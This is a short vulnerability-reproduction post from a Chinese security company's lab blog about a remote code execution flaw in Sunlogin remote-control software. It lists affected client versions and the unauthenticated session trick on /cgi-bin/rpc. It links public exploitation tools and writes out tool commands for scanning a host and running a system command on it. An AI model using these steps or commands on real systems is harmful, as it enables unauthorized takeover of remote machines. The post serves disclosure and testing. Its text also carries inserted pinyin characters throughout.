sunlogin rce向日葵遠(yuǎn)程代碼執(zhí)行漏洞_成都創(chuàng)信華通信息技術(shù)有限公司

<strike id="kne6g"><label id="kne6g"></label></strike>

新聞動態(tài) NEWS

咨詢服務(wù)熱線

400-6446-808

創(chuàng)安實驗室專欄

您的當(dāng)前位置:首頁 > 創(chuàng)安實驗室專欄

sunlogin rce向日葵遠(yuǎn)程代碼執(zhí)行漏洞

發(fā)布者：創(chuàng)信華通發(fā)布時間：2022-03-30 瀏覽量：564次

簡單介紹：

向日葵遠(yuǎn)程控制是一款提供遠(yuǎn)程控制服務(wù)的軟件。其支持主流操作系統(tǒng)Windows、Linux、Mac、Android、iOS跨平臺協(xié)同操作，在任何可連入互聯(lián)網(wǎng)的地點，都可以輕松訪問和控制安裝了向日葵遠(yuǎn)程控制客戶端的設(shè)備。整個遠(yuǎn)控過程，可通過瀏覽器直接進(jìn)行，無需再安裝軟件。

影響版本

向日葵客戶端：

· 11.1.1

· 10.3.0.27372

· 11.0.0.33162

漏洞復(fù)現(xiàn)

復(fù)現(xiàn)版本：10.3.0.27372

一

1、訪問掃描開放的端口

2、需要獲取到session，測試目標(biāo)是否存在/cgi-bin/rpc界面

3、在/cgi-bin/rpc 中，傳入action=verify-haras參數(shù)即可在未授權(quán)的情況下拿到有效session

4、使用獲取到的session執(zhí)行系統(tǒng)命令

二

也可使用漏洞檢測和利用工具，如下：

檢測和利用工具下載地址：https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

1、運行命令得到漏洞端口：xrkRce.exe -h 192.168.16.128 -t scan

2、執(zhí)行系統(tǒng)命令：xrkRce.exe -h 192.168.16.128 -t rce -p 49156 -c "whoami"

三

批量檢測：https://github.com/mrknow001/Sunlogin-rce

本文由創(chuàng)信華通創(chuàng)安攻防實驗室編輯。

本文僅限于個人學(xué)習(xí)和技術(shù)研究，由于傳播、利用此文所提供的信息而造成刑事案件、非授權(quán)攻擊等違法行為，均由使用者本人負(fù)責(zé)，本單位不為此承擔(dān)任何責(zé)任。創(chuàng)安攻防實驗室擁有對此文章的修改和解釋權(quán)，如欲轉(zhuǎn)載或傳播此文章，必須保證此文章的完整性，包括版權(quán)聲明等全部內(nèi)容。

如有侵權(quán)，請聯(lián)系后臺。

成都創(chuàng)信華通信息技術(shù)有限公司

成都創(chuàng)信華通信息技術(shù)有限公司自成立以來一直秉承“求真務(wù)實、創(chuàng)新卓越”的文化理念，堅持“開創(chuàng)、誠信、規(guī)范、專業(yè)”的經(jīng)營宗旨，竭盡全力為網(wǎng)絡(luò)安全和國家安全保駕護(hù)航。我司以“等保測評”、“密碼測評、“軟件測試”、“安全服務(wù)”為基礎(chǔ)，以綜合服務(wù)為延伸，形成“4+N”的業(yè)務(wù)布局，針對多個行業(yè)形成系統(tǒng)的、全面的解決方案和網(wǎng)絡(luò)安全保障體系。服務(wù)領(lǐng)域包括黨政、政法、醫(yī)療、能源、教育、金融、工業(yè)互聯(lián)網(wǎng)以及關(guān)鍵信息基礎(chǔ)設(shè)施等多個方面。期待與您的合作！

下一條：創(chuàng)安攻防實驗室關(guān)于Spring Framework遠(yuǎn)程代碼執(zhí)行漏洞風(fēng)險提示

返回列表